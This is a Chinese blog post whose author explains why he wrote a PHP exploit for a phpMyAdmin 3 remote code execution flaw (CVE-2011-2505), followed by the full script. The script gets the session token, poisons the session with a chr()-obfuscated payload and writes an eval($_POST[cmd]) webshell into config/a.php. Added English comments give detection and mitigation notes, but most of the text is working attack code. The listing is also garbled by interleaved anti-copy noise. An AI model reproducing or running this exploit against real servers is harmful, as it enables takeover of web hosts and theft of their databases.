最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论。虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了;据黑哥说有不鸡肋的利用方法,于是夜里翻出代码研究了一番,写出了这个冷饭exp。由于我搞得晚了,之前已经很多人研究并写了exp,所以我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
#!/usr/bin/php& p9 T4 U. u a! `% m
<?php
// Banner printed on every run. The header text below identifies this listing as an
// exploit script for phpMyAdmin 3 (the banner cites CVE-2011-2505). As reproduced on
// this page the code is interleaved with forum anti-copy noise, so it is not runnable
// as shown; it is kept for defensive review of the technique.
: @; `( ]2 v3 t {print_r('
/ l) q5 Q8 w; L1 B; n( F: h+---------------------------------------------------------------------------+
# b' d, t* O# n3 k/ vpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
# k" V7 j" d# j8 }8 \- e4 Qby oldjun(www.oldjun.com)1 r; r1 Z3 V) S- O5 |, \ r7 ^
welcome to www.t00ls.net
. m1 b7 G3 A5 Q* @mail: oldjun@gmail.com# {' G. {" e( e- U/ F
Assigned CVE id: CVE-2011-2505
" s5 ^* t; s- ^1 {+---------------------------------------------------------------------------+" H0 o. d- N* Z8 w6 Z+ C
');6 J/ P2 ?# {! i3 r' d/ y1 Y
; v P/ q* @0 h s
/**' K5 J* Q: k% W$ l+ j, a& l
* working when the directory:"config" exists and is writeable.1 G' s4 @5 V0 T9 ~( t: M
**/2 I" e: b' F* z
// Usage check: $argv[0] is the script name, so fewer than three entries means the
// host or path argument is missing; print the usage text and stop.
0 {0 y; [2 B: h9 o4 [if ($argc < 3) {, h" x7 `' p1 j; s3 h
print_r('
! \6 L$ R5 N# s( }4 ~ L+---------------------------------------------------------------------------+# Y/ B0 q* Y2 p# c8 k: \
Usage: php '.$argv[0].' host path6 Z- j& U1 U j' B
host: target server (ip/hostname)
. n$ Z8 Q& w+ m/ }8 @% v2 Apath: path to pma3
# l0 r* G( n4 D5 |Example:
; o0 m6 g& n" Sphp '.$argv[0].' localhost /pma/
, t. Y; K4 ~0 Q! \! |: j+---------------------------------------------------------------------------+2 O+ v, g0 Q. P* u) [9 @9 m
');
# q+ ^: ]( j- M, [0 D) \5 B( L exit;) H4 {' u7 @( S
}
! _' G" b6 Z) g( J. e* i" C
// Target host and phpMyAdmin base path from the command line; php_request() further
// down reads both as globals, so every request is built from these two values.
7 k. i2 S4 b s; p$host = $argv[1];
# ]/ }4 l2 K. Q0 D+ A$path = $argv[2];8 v; X& J9 u/ [
% g3 P, ]' ` M7 ~! i5 t4 @8 M
/**
! |3 `/ \, x8 [$ K9 T * Try to determine if the directory:"config" exists' Y' |# p. R' i1 O) y. E
**/
// Step 1: GET <path>config/ and treat a "404" anywhere in the raw response as
// "directory absent". Defender note: config/ existing and being writable is the one
// precondition the author's header says cannot be bypassed; a deployment that removes
// or write-protects config/ once setup is finished does not meet it.
' z1 n! o* `/ L* l- U1 _echo "[+] Try to determine if the directory:config exists....\n";
2 p1 v) P* F, o( c% g- ~$returnstr=php_request('config/');
" I! a" a5 ?9 Q- y, d; uif(strpos($returnstr,'404')){
, O1 c1 k' m, z- Q0 k exit("[-] Exploit Failed! The directory:config do not exists!\n");, j P* R8 W( l$ |
}& @/ S' g! u1 g; Z4 Q" E
" x$ h( L' P" x
/**3 o$ I. }2 E0 A' x7 O: ]
* Try to get token and sessionid
, ^( i9 n2 y' r3 F H- M3 G- N**/
// Step 2: fetch index.php with no cookie and regex the phpMyAdmin session-cookie value
// (capture 1) and the per-session token (capture 3) out of the raw response; both are
// replayed in the later requests. No credentials are involved at this point.
1 J h6 A- {2 m! recho "[+] Try to get token and sessionid....\n";
$ a9 V! P. g7 _. l3 L$result=php_request('index.php');
2 E+ o2 U( T$ X/ u- @preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);6 Y1 I7 A/ J, H& q
$token=$resp[3];
3 J- K% J( j* H' L$sessionid=$resp[1];
0 F; `7 p2 q l, Qif($token && $sessionid){
' b u4 ?1 n. Y! H; m+ }( L# C v' s echo "[+] token token\n";
K- y l& {. U5 p a$ \ echo "[+] Session ID sessionid\n";
# L7 ]# F3 B; K- s4 W; X; s}else{
, H* o/ f" b) H( a exit("[-] Can't get token and Session ID,Exploit Failed!\n");( z+ |8 C% u1 E1 k* F" K
}
& K+ \6 {% l* F+ w# e# Q
6 L" @% D) n: s1 F4 N" ]1 c" m/**
: q- i$ w5 r/ U* z; h8 k$ ~ * Try to insert shell into session( N& a3 v& z/ {' O1 K: p4 P) F
**/
// Step 3: a single GET to db_create.php carrying the captured token, a session_to_unset
// parameter and a `_SESSION[ConfigFile][Servers][...]` key whose index is an obfuscated
// PHP fragment built from chr() calls. This is the session-poisoning step the write-up
// refers to; the author's trailing comment says most top-level pma3 scripts accept the
// same parameters. Detection: query strings containing `session_to_unset=` together
// with `_SESSION[` are a clear indicator of this technique in access logs.
8 N) d7 q6 O# w7 [' d* G3 becho "[+] Try to insert shell into session....\n";
, y$ I4 o/ `- g% v yphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
: [+ x9 v/ {4 ]) m, Q3 b# X7 K- ? b. N& q1 ^
/**
' ?* l, @( Z" y- ?, I- D% I' D * Try to create webshell1 ]' l0 @- M. H+ {1 S
**/8 \; t9 e9 T1 q6 K' Q- m' Q
// Step 4: POST to setup/config.php with submit_save=Save, replaying the same session
// cookie and token, so that the setup script saves the poisoned ConfigFile session data
// (step 5 then looks for the result under config/). Mitigation: setup/ is only needed
// during installation — keep it and config/ unreachable on a live deployment and apply
// the vendor fix for the CVE named in the banner.
echo "[+] Try to create webshell....\n";
& s% N8 \7 I0 b. W( t, Aphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
. ~* `1 F! J' o# D/**
7 y2 f# r- Q+ H$ a6 k * Try to check if the webshell was created successfully% y l7 |8 F9 r2 `9 a
**/1 t% r0 o5 S$ q% {( B6 m
// Step 5: fetch config/config.inc.php and look for the marker "t00ls" in the raw
// response; on success the script prints where it expects the dropped file to be.
// Indicators of compromise: an unexpected config/a.php, or a config/config.inc.php
// that contains executable code rather than plain configuration values.
echo "[+] Try to check if the webshell was created successfully....\n";
$ d# C! U: k; |2 q9 g9 X# \7 E$content=php_request('config/config.inc.php');# A( U% A! |6 Q$ b+ ~( p( v4 ?
if(strpos($content,'t00ls')){
" f* v4 D8 t S; {. s8 W. E echo "[+] Congratulations! Expoilt successfully....\n";
& I- q2 y' H5 Q8 e b* K echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
& l; K0 o; J0 B2 M1 f}else{
2 w i5 X9 H3 i, W% l- a3 g7 u exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");! l1 Y& ]( P$ ?1 P
}
1 M. `0 [+ [4 [- ]( W0 K \, y8 M2 b( ~
/**
 * Minimal hand-rolled HTTP/1.1 client used by every step above.
 *
 * @param string $url    request path relative to the global $path (e.g. 'index.php')
 * @param string $data   urlencoded body; when non-empty the method becomes POST and
 *                       Content-Type/Content-Length headers are added
 * @param string $cookie raw Cookie header value, sent only when non-empty
 * @return string        the complete raw response (status line, headers and body),
 *                       read until the server closes the connection
 *
 * Reads the globals $host and $path set by the caller. Connects to port 80 only (no TLS),
 * does not check the fputs() result, and on connect failure prints a message and die()s.
 */
/ ~7 J* v/ D# V/ k7 U! v5 y" Hfunction php_request($url,$data='',$cookie=''){
8 D9 W7 P) `& ~' |% l) d& \ global $host, $path;
, ?1 x4 r% e# I; }" w
// A body is what decides between POST and GET.
3 Q( X" Y3 x, l( O: v $method=$data?'POST':'GET';$ K8 L9 ^8 @4 |8 f
5 y# k/ y& g% w x: M9 N
// Request line and headers are concatenated by hand; the User-Agent string is a fixed
// old-browser value, which is itself a usable log signature for this script.
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
* A* \! e# Q! z0 h" X $packet .= "Accept: */*\r\n";& J7 V$ H% w5 L3 B! R
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";% L6 J4 o& v2 b5 {0 l
$packet .= "Host: $host\r\n";9 t8 `; t! L: j' o$ U: {
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
) A# `+ ~) S/ q2 ]: ]- h $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
/ }# O9 a% u# _ $packet .= $cookie?"Cookie: $cookie\r\n":"";4 E9 Y* [( i, Z- n/ t- j' g: p
$packet .= "Connection: Close\r\n\r\n";
6 _% Q/ O3 k2 K3 B" ^- X" S $packet .= $data?$data:"";
0 q- k8 Z, H9 c2 A/ e8 D
// Plain TCP to port 80 after resolving the host name; no TLS, no timeout argument.
! ?* S. ~2 V% I/ X D/ f" c $fp = fsockopen(gethostbyname($host), 80);
1 j& f& e! w0 E+ T if (!$fp) {
- F8 i+ {. o+ A2 l3 a) G. B0 o echo 'No response from '.$host; die;0 r3 U- S* D) _/ ~7 r
}3 [+ b2 b+ m9 K5 s" }* a
fputs($fp, $packet);5 K7 |" i2 q! j7 c6 Y
% e( t# Z3 U9 K $resp = '';
3 [4 V, y/ H, v% u( Z. s, Z$ w+ j7 t& {0 O* N" G" w& C
// Accumulate the whole response in 1 KiB chunks until EOF (Connection: Close above).
while ($fp && !feof($fp))' R4 S% i5 }. | \* X! `
$resp .= fread($fp, 1024);+ h- D2 r' `! X8 e2 c
7 w/ L( G+ A0 A* J) X$ x2 | return $resp;
0 X0 @5 _: m: f; c& V}
9 I2 C* L% {6 \+ A u 5 M6 y; h5 y5 Q- n+ R9 r0 n/ g
?>
& o! v2 n$ J t* L: R2 k- X+ l. |